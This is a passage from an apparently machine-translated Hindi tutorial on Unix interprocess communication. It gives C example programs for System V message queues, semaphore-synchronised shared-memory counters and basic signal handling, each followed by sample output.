#define PERMS 0644
struct my_msgbuf {
   long mtype;
   char mtext[200];
};

int main(void) {
   struct my_msgbuf buf;
   int msqid;
   int len;
   key_t key;
   system("touch msgq.txt");
   
   if ((key = ftok("msgq.txt", 'B')) == -1) {
      perror("ftok");
      exit(1);
   }
   
   if ((msqid = msgget(key, PERMS | IPC_CREAT)) == -1) {
      perror("msgget");
      exit(1);
   }
   printf("message queue: ready to send messages.\n");
   printf("Enter lines of text, ^D to quit:\n");
   buf.mtype = 1; /* we don't really care in this case */
   
   while(fgets(buf.mtext, sizeof buf.mtext, stdin) != NULL) {
      len = strlen(buf.mtext);
      /* remove newline at end, if it exists */
      if (buf.mtext[len-1] == '\n') buf.mtext[len-1] = '\0';
      if (msgsnd(msqid, &buf, len+1, 0) == -1) /* +1 for '\0' */
      perror("msgsnd");
   }
   strcpy(buf.mtext, "end");
   len = strlen(buf.mtext);
   if (msgsnd(msqid, &buf, len+1, 0) == -1) /* +1 for '\0' */
   perror("msgsnd");
   
   if (msgctl(msqid, IPC_RMID, NULL) == -1) {
      perror("msgctl");
      exit(1);
   }
   printf("message queue: done sending messages.\n");
   return 0;
}

संकलन और निष्पादन कदम

message queue: ready to send messages.
Enter lines of text, ^D to quit:
this is line 1
this is line 2
message queue: done sending messages.

संदेश प्राप्त करने की प्रक्रिया का कोड निम्नलिखित है (कतार से संदेश प्राप्त करना) - फाइल: msgq_recv.c

/* Filename: msgq_recv.c */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define PERMS 0644
struct my_msgbuf {
   long mtype;
   char mtext[200];
};

int main(void) {
   struct my_msgbuf buf;
   int msqid;
   int toend;
   key_t key;
   
   if ((key = ftok("msgq.txt", 'B')) == -1) {
      perror("ftok");
      exit(1);
   }
   
   if ((msqid = msgget(key, PERMS)) == -1) { /* connect to the queue */
      perror("msgget");
      exit(1);
   }
   printf("message queue: ready to receive messages.\n");
   
   for(;;) { /* normally receiving never ends but just to make conclusion 
             /* this program ends wuth string of end */
      if (msgrcv(msqid, &buf, sizeof(buf.mtext), 0, 0) == -1) {
         perror("msgrcv");
         exit(1);
      }
      printf("recvd: \"%s\"\n", buf.mtext);
      toend = strcmp(buf.mtext,"end");
      if (toend == 0)
      break;
   }
   printf("message queue: done receiving messages.\n");
   system("rm msgq.txt");
   return 0;
}

संकलन और निष्पादन कदम

message queue: ready to receive messages.
recvd: "this is line 1"
recvd: "this is line 2"
recvd: "end"
message queue: done receiving messages.

सबसे पहला सवाल जो दिमाग में आता है, वह यह है कि हमें सेमाफोर की आवश्यकता क्यों है? एक सरल उत्तर, कई प्रक्रियाओं के बीच साझा किए गए महत्वपूर्ण / सामान्य क्षेत्र की रक्षा करना।

आइए मान लेते हैं, कई प्रक्रियाएं समान क्षेत्र के कोड का उपयोग कर रही हैं और यदि सभी समानांतर रूप से एक्सेस करना चाहते हैं तो परिणाम ओवरलैप किया जाता है। उदाहरण के लिए, कई उपयोगकर्ता केवल एक प्रिंटर (सामान्य / महत्वपूर्ण अनुभाग) का उपयोग कर रहे हैं, 3 उपयोगकर्ताओं का कहना है कि एक ही समय में 3 नौकरियां दी जाती हैं, यदि सभी नौकरियां समानांतर रूप से शुरू होती हैं, तो एक उपयोगकर्ता आउटपुट दूसरे के साथ ओवरलैप किया जाता है। इसलिए, हमें इस बात की रक्षा करने की आवश्यकता है कि सेमीफोर का उपयोग करते हुए, जब एक प्रक्रिया चल रही हो और जब यह पूरा हो जाए तो अनलॉक करना महत्वपूर्ण खंड को लॉक कर दे। यह प्रत्येक उपयोगकर्ता / प्रक्रिया के लिए दोहराया जाएगा ताकि एक नौकरी दूसरी नौकरी के साथ ओवरलैप न हो।

मूल रूप से सेमाफोर को दो प्रकारों में वर्गीकृत किया जाता है -

Binary Semaphores - केवल दो राज्य 0 & 1, यानी, लॉक / अनलॉक या उपलब्ध / अनुपलब्ध, म्यूटेक्स कार्यान्वयन।

Counting Semaphores - सेमाफोर जो मनमाने संसाधन गणना की अनुमति देते हैं, गिनती के सेमाफोर कहलाते हैं।

मान लें कि हमारे पास 5 प्रिंटर हैं (यह समझने के लिए कि 1 प्रिंटर केवल 1 नौकरी स्वीकार करता है) और हमें प्रिंट करने के लिए 3 नौकरियां मिलीं। अब 3 प्रिंटर (1 प्रत्येक) के लिए 3 नौकरी दी जाएगी। फिर से 4 नौकरियां आईं जबकि यह प्रगति पर है। अब, उपलब्ध 2 प्रिंटरों में से, 2 कार्य शेड्यूल किए गए हैं और हमें 2 और नौकरियों के साथ छोड़ दिया गया है, जो संसाधन / प्रिंटर उपलब्ध होने के बाद ही पूरा होगा। संसाधन उपलब्धता के अनुसार इस तरह के शेड्यूलिंग को सेमाफोरस के रूप में देखा जा सकता है।

सेमाफोर का उपयोग करके सिंक्रनाइज़ेशन करने के लिए, निम्नलिखित कदम हैं -

Step 1 - एक सेमाफोर बनाएं या पहले से मौजूद सेमाफोर (सेगमेंट) से कनेक्ट करें

Step 2 - सेमाफोर पर ऑपरेशन करें अर्थात संसाधनों का आवंटन या विमोचन करें या प्रतीक्षा करें (semop ())

Step 3 - संदेश कतार (semctl ()) पर नियंत्रण संचालन करें

अब, हमारे पास मौजूद सिस्टम कॉल के साथ इसे जांचें।

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>

int semget(key_t key, int nsems, int semflg)

यह सिस्टम कॉल सिस्टम V सेमाफोर सेट बनाता है या आवंटित करता है। निम्नलिखित तर्कों को पारित करने की आवश्यकता है -

  • पहला तर्क, कुंजी, संदेश कतार को पहचानता है। कुंजी या तो एक मनमाना मूल्य हो सकती है या एक जो लाइब्रेरी फंक्शन ftok () से ली जा सकती है।

  • दूसरा तर्क, nsems, सेमाफोर की संख्या को निर्दिष्ट करता है। यदि बाइनरी है, तो यह 1 है, 1 सेमीफोर सेट की आवश्यकता का अर्थ है, अन्यथा सेमाफोर सेट की संख्या की आवश्यक गणना के अनुसार।

  • तीसरा तर्क, semflg, आवश्यक semaphore ध्वज / s निर्दिष्ट करता है जैसे IPC_CREAT (यदि यह मौजूद नहीं है तो semaphore बनाना) या IPC_EXCL (semCore बनाने के लिए IPC_CREAT के साथ उपयोग किया जाता है और कॉल विफल हो जाता है, यदि कोई semaphore पहले से मौजूद है)। साथ ही परमिशन पास करने की जरूरत है।

Note - अनुमतियों के विवरण के लिए पहले के खंड देखें।

यह कॉल वैध अर्ध-पहचानकर्ता (सफलता के लिए अर्धशतक के आगे के कॉल के लिए प्रयुक्त) और विफलता के मामले में -1 लौटाएगा। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

इस कॉल के संबंध में विभिन्न त्रुटियां हैं EACCESS (अनुमति अस्वीकृत), EEXIST (कतार पहले से मौजूद नहीं है), ENOENT (कतार मौजूद नहीं है), ENOMEM (कतार बनाने के लिए पर्याप्त मेमोरी नहीं), ENOSPC (अधिकतम सेट सीमा) पार हो गई), आदि।

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>

int semop(int semid, struct sembuf *semops, size_t nsemops)

यह सिस्टम कॉल सिस्टम V सेमीफोर सेट पर परिचालन करता है, संसाधनों का आवंटन करता है, संसाधनों की प्रतीक्षा करता है या संसाधनों को मुक्त करता है। निम्नलिखित तर्कों को पारित करने की आवश्यकता है -

  • पहला तर्क, semid, semaphore सेट आइडेंटिफ़ायर को semget () द्वारा इंगित करता है।

  • दूसरा तर्क, वीर्यपात, अर्धचाल सेट पर किए जाने वाले कार्यों की एक सरणी के लिए सूचक है। संरचना इस प्रकार है -

struct sembuf {
   unsigned short sem_num; /* Semaphore set num */
   short sem_op; /* Semaphore operation */
   short sem_flg; /* Operation flags, IPC_NOWAIT, SEM_UNDO */
};

उपरोक्त संरचना में तत्व, sem_op, उस ऑपरेशन को इंगित करता है जिसे करने की आवश्यकता है -

  • यदि sem_op –ve है, तो संसाधन आवंटित करें या प्राप्त करें। जब तक पर्याप्त संसाधनों को अन्य प्रक्रियाओं द्वारा मुक्त नहीं किया गया है, तब तक कॉलिंग प्रक्रिया को अवरुद्ध करता है, ताकि यह प्रक्रिया आवंटित हो सके।

  • यदि sem_op शून्य है, तो कॉलिंग प्रक्रिया प्रतीक्षा करती है या तब तक सोती है जब तक कि semaphore मान 0 तक नहीं पहुँच जाता।

  • यदि sem_op + ve है, तो संसाधन जारी करें।

उदाहरण के लिए -

संरचना sembuf sem_lock = {0, -1, SEM_UNDO};

संरचना sembuf sem_unlock = {0, 1, SEM_UNDO};

  • तीसरा तर्क, nsemops, उस सरणी में परिचालनों की संख्या है।

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>

int semctl(int semid, int semnum, int cmd, …)

यह सिस्टम कॉल सिस्टम V सेमाफोर के लिए कंट्रोल ऑपरेशन करता है। निम्नलिखित तर्कों को पारित करने की आवश्यकता है -

  • पहला तर्क, अर्धविराम, अर्धवृत्त का पहचानकर्ता है। यह आईडी सेमीफोर आइडेंटिफायर है, जो कि सेगमेंट () सिस्टम कॉल का रिटर्न वैल्यू है।

  • दूसरा तर्क, सेमनम, सेमाफोर की संख्या है। सेमाफोर 0 से गिने जाते हैं।

  • तीसरा तर्क, सेमीड, सेमाफोर पर आवश्यक नियंत्रण ऑपरेशन करने के लिए कमांड है।

  • चौथा तर्क, प्रकार, यूनियन सेमन, सीएमडी पर निर्भर करता है। कुछ मामलों के लिए, चौथा तर्क लागू नहीं होता है।

आइए संघ सेमिनार की जाँच करें -

union semun {
   int val; /* val for SETVAL */
   struct semid_ds *buf; /* Buffer for IPC_STAT and IPC_SET */
   unsigned short *array; /* Buffer for GETALL and SETALL */
   struct seminfo *__buf; /* Buffer for IPC_INFO and SEM_INFO*/
};

Semid_ds डेटा संरचना जिसे sys / sem.h में परिभाषित किया गया है वह इस प्रकार है -

struct semid_ds {
   struct ipc_perm sem_perm; /* Permissions */
   time_t sem_otime; /* Last semop time */
   time_t sem_ctime; /* Last change time */
   unsigned long sem_nsems; /* Number of semaphores in the set */
};

Note - कृपया अन्य डेटा संरचनाओं के लिए मैनुअल पेज देखें।

संघ सेमिन अरग; Cmd के लिए मान्य मान हैं -

  • IPC_STAT- arg.buf द्वारा बताई गई संरचना को संरचनात्मक semid_ds के प्रत्येक सदस्य के वर्तमान मूल्यों की जानकारी की प्रतिलिपि। इस कमांड के लिए सेमाफोर को पढ़ने की अनुमति आवश्यक है।

  • IPC_SET - उपयोगकर्ता आईडी, स्वामी की समूह आईडी, अनुमतियाँ, आदि संरचना semid_ds द्वारा इंगित करता है।

  • IPC_RMID - सेमाफोरस सेट को हटाता है।

  • IPC_INFO - arg .__ buf द्वारा बताई गई संरचना semid_ds में अर्ध-सीमा और मापदंडों की जानकारी लौटाती है।

  • SEM_INFO - अर्धचालक द्वारा भस्म सिस्टम संसाधनों के बारे में जानकारी युक्त एक सेमीफाइनल संरचना लौटाता है।

यह कॉल पारित आदेश के आधार पर मान (गैर-नकारात्मक मान) लौटाएगा। सफलता के बाद, IPC_INFO और SEM_INFO या SEM_STAT, सेमाफोर के अनुसार उच्चतम उपयोग किए गए प्रविष्टि के सूचकांक या पहचानकर्ता या GETNCNT के लिए अर्धवृत्त का मूल्य या GETPID के लिए sempid का मान या सफलता के लिए अन्य कार्यों के लिए GETVAL 0 के लिए मान का रिटर्न या 1 विफलता के मामले में। विफलता के कारण को जानने के लिए, गलत चर या गड़बड़ी () फ़ंक्शन के साथ जांचें।

कोड को देखने से पहले, आइए हम इसके कार्यान्वयन को समझते हैं -

  • दो प्रक्रियाओं का कहना है, बच्चे और माता-पिता बनाएँ।

  • साझा मेमोरी में पढ़ने / लिखने की प्रक्रिया के अंत को इंगित करने के लिए काउंटर और अन्य झंडे को संग्रहीत करने के लिए मुख्य रूप से आवश्यक साझा मेमोरी बनाएं।

  • काउंटर को माता-पिता और बच्चे दोनों प्रक्रियाओं द्वारा गणना द्वारा बढ़ाया जाता है। गिनती या तो कमांड लाइन तर्क के रूप में पारित की जाती है या डिफ़ॉल्ट के रूप में ली जाती है (यदि कमांड लाइन तर्क के रूप में पारित नहीं हुई है या मान 10000 से कम है)। माता-पिता और बच्चे दोनों एक ही समय में साझा स्मृति तक पहुँचते हैं, यह सुनिश्चित करने के लिए निश्चित नींद के समय के साथ कॉल किया जाता है।

  • चूंकि, काउंटर माता-पिता और बच्चे दोनों द्वारा 1 के चरणों में बढ़ाया जाता है, अंतिम मूल्य काउंटर से दोगुना होना चाहिए। चूंकि, माता-पिता और बच्चे दोनों एक ही समय में ऑपरेशन करते हैं, इसलिए काउंटर को आवश्यकतानुसार नहीं बढ़ाया जाता है। इसलिए, हमें एक प्रक्रिया की पूर्णता सुनिश्चित करने की आवश्यकता है और उसके बाद अन्य प्रक्रिया पूरी करनी होगी।

  • उपरोक्त सभी कार्यान्वयन shm_write_cntr.c फ़ाइल में किए जाते हैं

  • काउंटर मूल्य फ़ाइल shm_read_cntr.c में लागू किया गया है या नहीं इसकी जाँच करें

  • पूर्णता सुनिश्चित करने के लिए, फ़ाइल shm_write_cntr_with_sem.c में सेमाफोर कार्यक्रम कार्यान्वित किया जाता है। पूरी प्रक्रिया को पूरा करने के बाद सेमाफोर को हटा दें (पढ़ने के बाद अन्य प्रोग्राम से किया जाता है)

  • चूंकि, हमारे पास साझा मेमोरी में काउंटर के मूल्य को पढ़ने के लिए अलग-अलग फाइलें हैं और लिखने से कोई प्रभाव नहीं पड़ता है, रीडिंग प्रोग्राम एक समान है (shm_read_cntr.c)

  • एक टर्मिनल में लेखन कार्यक्रम और दूसरे टर्मिनल से रीडिंग प्रोग्राम को निष्पादित करना हमेशा बेहतर होता है। चूंकि, कार्यक्रम लेखन और पढ़ने की प्रक्रिया पूरी होने के बाद ही निष्पादन को पूरा करता है, इसलिए प्रोग्राम को पूरी तरह से निष्पादित करने के बाद प्रोग्राम को चलाना ठीक है। लिखने का कार्यक्रम तब तक इंतजार करेगा जब तक कि पढ़ा हुआ कार्यक्रम न चला जाए और उसके पूरा हो जाने के बाद ही खत्म हो।

कार्यक्रम बिना सेमाफोर के।

/* Filename: shm_write_cntr.c */
#include<stdio.h>
#include<sys/ipc.h>
#include<sys/shm.h>
#include<sys/types.h>
#include<string.h>
#include<errno.h>
#include<stdlib.h>
#include<unistd.h>
#include<string.h>

#define SHM_KEY 0x12345
struct shmseg {
   int cntr;
   int write_complete;
   int read_complete;
};
void shared_memory_cntr_increment(int pid, struct shmseg *shmp, int total_count);

int main(int argc, char *argv[]) {
   int shmid;
   struct shmseg *shmp;
   char *bufptr;
   int total_count;
   int sleep_time;
   pid_t pid;
   if (argc != 2)
   total_count = 10000;
   else {
      total_count = atoi(argv[1]);
      if (total_count < 10000)
      total_count = 10000;
   }
   printf("Total Count is %d\n", total_count);
   shmid = shmget(SHM_KEY, sizeof(struct shmseg), 0644|IPC_CREAT);

   if (shmid == -1) {
      perror("Shared memory");
      return 1;
   }

   // Attach to the segment to get a pointer to it.
   shmp = shmat(shmid, NULL, 0);
   if (shmp == (void *) -1) {
      perror("Shared memory attach");
      return 1;
   }
   shmp->cntr = 0;
   pid = fork();

   /* Parent Process - Writing Once */
   if (pid > 0) {
      shared_memory_cntr_increment(pid, shmp, total_count);
   } else if (pid == 0) {
      shared_memory_cntr_increment(pid, shmp, total_count);
      return 0;
   } else {
      perror("Fork Failure\n");
      return 1;
   }
   while (shmp->read_complete != 1)
   sleep(1);

   if (shmdt(shmp) == -1) {
      perror("shmdt");
      return 1;
   }

   if (shmctl(shmid, IPC_RMID, 0) == -1) {
      perror("shmctl");
      return 1;
   }
   printf("Writing Process: Complete\n");
   return 0;
}

/* Increment the counter of shared memory by total_count in steps of 1 */
void shared_memory_cntr_increment(int pid, struct shmseg *shmp, int total_count) {
   int cntr;
   int numtimes;
   int sleep_time;
   cntr = shmp->cntr;
   shmp->write_complete = 0;
   if (pid == 0)
   printf("SHM_WRITE: CHILD: Now writing\n");
   else if (pid > 0)
   printf("SHM_WRITE: PARENT: Now writing\n");
   //printf("SHM_CNTR is %d\n", shmp->cntr);
   
   /* Increment the counter in shared memory by total_count in steps of 1 */
   for (numtimes = 0; numtimes < total_count; numtimes++) {
      cntr += 1;
      shmp->cntr = cntr;
      
      /* Sleeping for a second for every thousand */
      sleep_time = cntr % 1000;
      if (sleep_time == 0)
      sleep(1);
   }
   
   shmp->write_complete = 1;
   if (pid == 0)
   printf("SHM_WRITE: CHILD: Writing Done\n");
   else if (pid > 0)
   printf("SHM_WRITE: PARENT: Writing Done\n");
   return;
}

संकलन और निष्पादन कदम

Total Count is 10000
SHM_WRITE: PARENT: Now writing
SHM_WRITE: CHILD: Now writing
SHM_WRITE: PARENT: Writing Done
SHM_WRITE: CHILD: Writing Done
Writing Process: Complete

अब, हम साझा मेमोरी रीडिंग प्रोग्राम की जांच करते हैं।

/* Filename: shm_read_cntr.c */
#include<stdio.h>
#include<sys/ipc.h>
#include<sys/shm.h>
#include<sys/types.h>
#include<string.h>
#include<errno.h>
#include<stdlib.h>
#include<unistd.h>

#define SHM_KEY 0x12345
struct shmseg {
   int cntr;
   int write_complete;
   int read_complete;
};

int main(int argc, char *argv[]) {
   int shmid, numtimes;
   struct shmseg *shmp;
   int total_count;
   int cntr;
   int sleep_time;
   if (argc != 2)
   total_count = 10000;
   
   else {
      total_count = atoi(argv[1]);
      if (total_count < 10000)
      total_count = 10000;
   }
   shmid = shmget(SHM_KEY, sizeof(struct shmseg), 0644|IPC_CREAT);
   
   if (shmid == -1) {
      perror("Shared memory");
      return 1;
   }
   // Attach to the segment to get a pointer to it.
   shmp = shmat(shmid, NULL, 0);
   
   if (shmp == (void *) -1) {
      perror("Shared memory attach");
      return 1;
   }
   
   /* Read the shared memory cntr and print it on standard output */
   while (shmp->write_complete != 1) {
      if (shmp->cntr == -1) {
         perror("read");
         return 1;
      }
      sleep(3);
   }
   printf("Reading Process: Shared Memory: Counter is %d\n", shmp->cntr);
   printf("Reading Process: Reading Done, Detaching Shared Memory\n");
   shmp->read_complete = 1;
   
   if (shmdt(shmp) == -1) {
      perror("shmdt");
      return 1;
   }
   printf("Reading Process: Complete\n");
   return 0;
}

संकलन और निष्पादन कदम

Reading Process: Shared Memory: Counter is 11000
Reading Process: Reading Done, Detaching Shared Memory
Reading Process: Complete

यदि आप उपरोक्त आउटपुट का निरीक्षण करते हैं, तो काउंटर 20000 होना चाहिए, हालांकि, एक प्रक्रिया कार्य पूरा होने से पहले अन्य प्रक्रिया भी समानांतर में प्रसंस्करण कर रही है, काउंटर मान अपेक्षित नहीं है। आउटपुट सिस्टम से सिस्टम में अलग-अलग होगा और प्रत्येक निष्पादन के साथ अलग-अलग होगा। यह सुनिश्चित करने के लिए कि दो कार्य एक कार्य पूरा होने के बाद कार्य करते हैं, इसे सिंक्रोनाइज़ेशन मैकेनिज्म का उपयोग करके लागू किया जाना चाहिए।

अब, हम सेमीफोर का उपयोग करके उसी एप्लिकेशन की जांच करते हैं।

Note - रीडिंग प्रोग्राम वही रहता है।

/* Filename: shm_write_cntr_with_sem.c */
#include<stdio.h>
#include<sys/types.h>
#include<sys/ipc.h>
#include<sys/shm.h>
#include<sys/sem.h>
#include<string.h>
#include<errno.h>
#include<stdlib.h>
#include<unistd.h>
#include<string.h>

#define SHM_KEY 0x12345
#define SEM_KEY 0x54321
#define MAX_TRIES 20

struct shmseg {
   int cntr;
   int write_complete;
   int read_complete;
};
void shared_memory_cntr_increment(int, struct shmseg*, int);
void remove_semaphore();

int main(int argc, char *argv[]) {
   int shmid;
   struct shmseg *shmp;
   char *bufptr;
   int total_count;
   int sleep_time;
   pid_t pid;
   if (argc != 2)
   total_count = 10000;
   else {
      total_count = atoi(argv[1]);
      if (total_count < 10000)
      total_count = 10000;
   }
   printf("Total Count is %d\n", total_count);
   shmid = shmget(SHM_KEY, sizeof(struct shmseg), 0644|IPC_CREAT);
   
   if (shmid == -1) {
      perror("Shared memory");
      return 1;
   }
   // Attach to the segment to get a pointer to it.
   shmp = shmat(shmid, NULL, 0);
   
   if (shmp == (void *) -1) {
      perror("Shared memory attach: ");
      return 1;
   }
   shmp->cntr = 0;
   pid = fork();
   
   /* Parent Process - Writing Once */
   if (pid > 0) {
      shared_memory_cntr_increment(pid, shmp, total_count);
   } else if (pid == 0) {
      shared_memory_cntr_increment(pid, shmp, total_count);
      return 0;
   } else {
      perror("Fork Failure\n");
      return 1;
   }
   while (shmp->read_complete != 1)
   sleep(1);
   
   if (shmdt(shmp) == -1) {
      perror("shmdt");
      return 1;
   }
   
   if (shmctl(shmid, IPC_RMID, 0) == -1) {
      perror("shmctl");
      return 1;
   }
   printf("Writing Process: Complete\n");
   remove_semaphore();
   return 0;
}

/* Increment the counter of shared memory by total_count in steps of 1 */
void shared_memory_cntr_increment(int pid, struct shmseg *shmp, int total_count) {
   int cntr;
   int numtimes;
   int sleep_time;
   int semid;
   struct sembuf sem_buf;
   struct semid_ds buf;
   int tries;
   int retval;
   semid = semget(SEM_KEY, 1, IPC_CREAT | IPC_EXCL | 0666);
   //printf("errno is %d and semid is %d\n", errno, semid);
   
   /* Got the semaphore */
   if (semid >= 0) {
      printf("First Process\n");
      sem_buf.sem_op = 1;
      sem_buf.sem_flg = 0;
      sem_buf.sem_num = 0;
      retval = semop(semid, &sem_buf, 1);
      if (retval == -1) {
         perror("Semaphore Operation: ");
         return;
      }
   } else if (errno == EEXIST) { // Already other process got it
      int ready = 0;
      printf("Second Process\n");
      semid = semget(SEM_KEY, 1, 0);
      if (semid < 0) {
         perror("Semaphore GET: ");
         return;
      }
      
      /* Waiting for the resource */
      sem_buf.sem_num = 0;
      sem_buf.sem_op = 0;
      sem_buf.sem_flg = SEM_UNDO;
      retval = semop(semid, &sem_buf, 1);
      if (retval == -1) {
         perror("Semaphore Locked: ");
         return;
      }
   }
   sem_buf.sem_num = 0;
   sem_buf.sem_op = -1; /* Allocating the resources */
   sem_buf.sem_flg = SEM_UNDO;
   retval = semop(semid, &sem_buf, 1);
   
   if (retval == -1) {
      perror("Semaphore Locked: ");
      return;
   }
   cntr = shmp->cntr;
   shmp->write_complete = 0;
   if (pid == 0)
   printf("SHM_WRITE: CHILD: Now writing\n");
   else if (pid > 0)
   printf("SHM_WRITE: PARENT: Now writing\n");
   //printf("SHM_CNTR is %d\n", shmp->cntr);
   
   /* Increment the counter in shared memory by total_count in steps of 1 */
   for (numtimes = 0; numtimes < total_count; numtimes++) {
      cntr += 1;
      shmp->cntr = cntr;
      /* Sleeping for a second for every thousand */
      sleep_time = cntr % 1000;
      if (sleep_time == 0)
      sleep(1);
   }
   shmp->write_complete = 1;
   sem_buf.sem_op = 1; /* Releasing the resource */
   retval = semop(semid, &sem_buf, 1);
   
   if (retval == -1) {
      perror("Semaphore Locked\n");
      return;
   }
   
   if (pid == 0)
      printf("SHM_WRITE: CHILD: Writing Done\n");
      else if (pid > 0)
      printf("SHM_WRITE: PARENT: Writing Done\n");
      return;
}
   
void remove_semaphore() {
   int semid;
   int retval;
   semid = semget(SEM_KEY, 1, 0);
      if (semid < 0) {
         perror("Remove Semaphore: Semaphore GET: ");
         return;
      }
   retval = semctl(semid, 0, IPC_RMID);
   if (retval == -1) {
      perror("Remove Semaphore: Semaphore CTL: ");
      return;
   }
   return;
}

संकलन और निष्पादन कदम

Total Count is 10000
First Process
SHM_WRITE: PARENT: Now writing
Second Process
SHM_WRITE: PARENT: Writing Done
SHM_WRITE: CHILD: Now writing
SHM_WRITE: CHILD: Writing Done
Writing Process: Complete

अब, हम पढ़ने की प्रक्रिया द्वारा काउंटर मूल्य की जांच करेंगे।

निष्पादन के चरण

Reading Process: Shared Memory: Counter is 20000
Reading Process: Reading Done, Detaching Shared Memory
Reading Process: Complete

signalएक घटना की घटना को इंगित करने वाली एक प्रक्रिया के लिए एक अधिसूचना है। सिग्नल भी कहा जाता हैsoftware interrupt और इसकी घटना को जानने के लिए अनुमानित नहीं है, इसलिए इसे ए भी कहा जाता है asynchronous event

सिग्नल को एक संख्या या एक नाम के साथ निर्दिष्ट किया जा सकता है, आमतौर पर सिग्नल के नाम SIG से शुरू होते हैं। उपलब्ध सिग्नलों को कमांड किल-एल (लिस्टिंग सिग्नल नामों के लिए l) के साथ चेक किया जा सकता है, जो निम्नानुसार है -

जब भी कोई सिग्नल उठाया जाता है (या तो प्रोग्रामेटिक या सिस्टम जेनरेट किया गया सिग्नल), एक डिफ़ॉल्ट क्रिया की जाती है। क्या होगा यदि आप डिफ़ॉल्ट कार्रवाई नहीं करना चाहते हैं, लेकिन सिग्नल प्राप्त करने पर अपने स्वयं के कार्यों को करना चाहते हैं? क्या यह सभी संकेतों के लिए संभव है? हां, सिग्नल को हैंडल करना संभव है लेकिन सभी सिग्नल के लिए नहीं। क्या होगा यदि आप संकेतों को अनदेखा करना चाहते हैं, क्या यह संभव है? हां, संकेत की अनदेखी करना संभव है। सिग्नल को नजरअंदाज करने का अर्थ है न तो डिफ़ॉल्ट कार्रवाई करना और न ही सिग्नल को संभालना। लगभग सभी संकेतों को अनदेखा करना या संभालना संभव है। जिन संकेतों को नजरअंदाज नहीं किया जा सकता है या जिन्हें संभाला / पकड़ा जाता है वे हैं SIGSTOP और SIGKILL।

सारांश में, संकेतों के लिए की जाने वाली क्रियाएं इस प्रकार हैं -

  • डिफ़ॉल्ट क्रिया
  • संकेत संभालना
  • संकेत पर ध्यान न दें

जैसा कि चर्चा की गई है कि सिग्नल को डिफ़ॉल्ट कार्रवाई के निष्पादन में फेरबदल किया जा सकता है। सिग्नल कॉलिंग को दो तरीकों से किया जा सकता है, यानी, सिस्टम कॉल, सिग्नल () और सिगनेशन () के माध्यम से।

#include <signal.h>

typedef void (*sighandler_t) (int);
sighandler_t signal(int signum, sighandler_t handler);

सिस्टम कॉल सिग्नल () सिग्नल की पीढ़ी पर पंजीकृत हैंडलर को संकेत के रूप में वर्णित करेगा। हैंडलर या तो SIG_IGN (सिग्नल को नजरअंदाज करना), SIG_DFL (डिफ़ॉल्ट तंत्र पर वापस सिग्नल सेट करना) या उपयोगकर्ता द्वारा परिभाषित सिग्नल हैंडलर या फ़ंक्शन एड्रेस में से एक हो सकता है।

यह सिस्टम सफलता पर कॉल एक फ़ंक्शन का पता देता है जो पूर्णांक तर्क लेता है और जिसका कोई रिटर्न मान नहीं है। यह कॉल त्रुटि के मामले में SIG_ERR देता है।

यद्यपि सिग्नल () के साथ संबंधित सिग्नल हैंडलर को उपयोगकर्ता द्वारा पंजीकृत किया जा सकता है, ठीक ट्यूनिंग जैसे सिग्नल को मास्क करना, जिसे ब्लॉक किया जाना चाहिए, सिग्नल के व्यवहार को संशोधित करना, और अन्य कार्य संभव नहीं हैं। यह सिगनेशन () सिस्टम कॉल का उपयोग करके संभव है।

#include <signal.h>

int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact)

यह सिस्टम कॉल सिग्नल एक्शन को जांचने या बदलने के लिए किया जाता है। यदि अधिनियम शून्य नहीं है, तो सिग्नल साइनम के लिए नई कार्रवाई अधिनियम से स्थापित की गई है। यदि पुराना निष्क्रिय नहीं है, तो पिछली कार्रवाई पुराने में बच जाती है।

सिगनेशन संरचना में निम्नलिखित फ़ील्ड शामिल हैं -

Field 1 - हैंडलर का उल्लेख या तो sa_handler या sa_sigaction में किया गया है।

void (*sa_handler)(int);
void (*sa_sigaction)(int, siginfo_t *, void *);

Sa_handler के लिए हैंडलर साइनम के आधार पर की जाने वाली कार्रवाई को निर्दिष्ट करता है और SIG_DFL के साथ सिग्नल या फ़ंक्शन को सिग्नल हैंडलिंग फ़ंक्शन को अनदेखा करने के लिए डिफ़ॉल्ट कार्रवाई या SIG_IGN को दर्शाता है।

Sa_sigaction के लिए हैंडलर पहले तर्क के रूप में सिग्नल संख्या को निर्दिष्ट करता है, दूसरे तर्क के रूप में siginfo_t संरचना को सूचक और तीसरे संदर्भ के रूप में आगे के विवरण के लिए उपयोगकर्ता संदर्भ (चेक getcontext () या setcontext () की जांच करता है।

संरचना siginfo_t में सिग्नल की जानकारी होती है जैसे कि डिलीवर करने के लिए सिग्नल नंबर, सिग्नल वैल्यू, प्रोसेस आईडी, भेजने की प्रक्रिया की असली यूजर आईडी इत्यादि।

Field 2 - अवरुद्ध होने के लिए संकेतों का सेट।

int sa_mask;

यह चर सिग्नल के मास्क को निर्दिष्ट करता है जिसे सिग्नल हैंडलर के निष्पादन के दौरान अवरुद्ध किया जाना चाहिए।

Field 3 - विशेष झंडे।

int sa_flags;

यह फ़ील्ड फ़्लैग का एक सेट निर्दिष्ट करती है जो सिग्नल के व्यवहार को संशोधित करती है।

Field 4 - हैंडलर बहाल करें।

void (*sa_restorer) (void);

यह सिस्टम सफलता पर 0 और विफलता के मामले में -1 रिटर्न देता है।

आइए हम कुछ नमूना कार्यक्रमों पर विचार करें।

सबसे पहले, हम एक नमूना कार्यक्रम के साथ शुरू करते हैं, जो अपवाद उत्पन्न करता है। इस कार्यक्रम में, हम शून्य ऑपरेशन द्वारा विभाजित करने की कोशिश कर रहे हैं, जिससे सिस्टम एक अपवाद उत्पन्न करता है।

/* signal_fpe.c */
#include<stdio.h>

int main() {
   int result;
   int v1, v2;
   v1 = 121;
   v2 = 0;
   result = v1/v2;
   printf("Result of Divide by Zero is %d\n", result);
   return 0;
}

संकलन और निष्पादन कदम

Floating point exception (core dumped)

इस प्रकार, जब हम एक अंकगणितीय ऑपरेशन करने की कोशिश कर रहे हैं, तो सिस्टम ने कोर डंप के साथ एक फ्लोटिंग पॉइंट अपवाद उत्पन्न किया है, जो सिग्नल की डिफ़ॉल्ट क्रिया है।

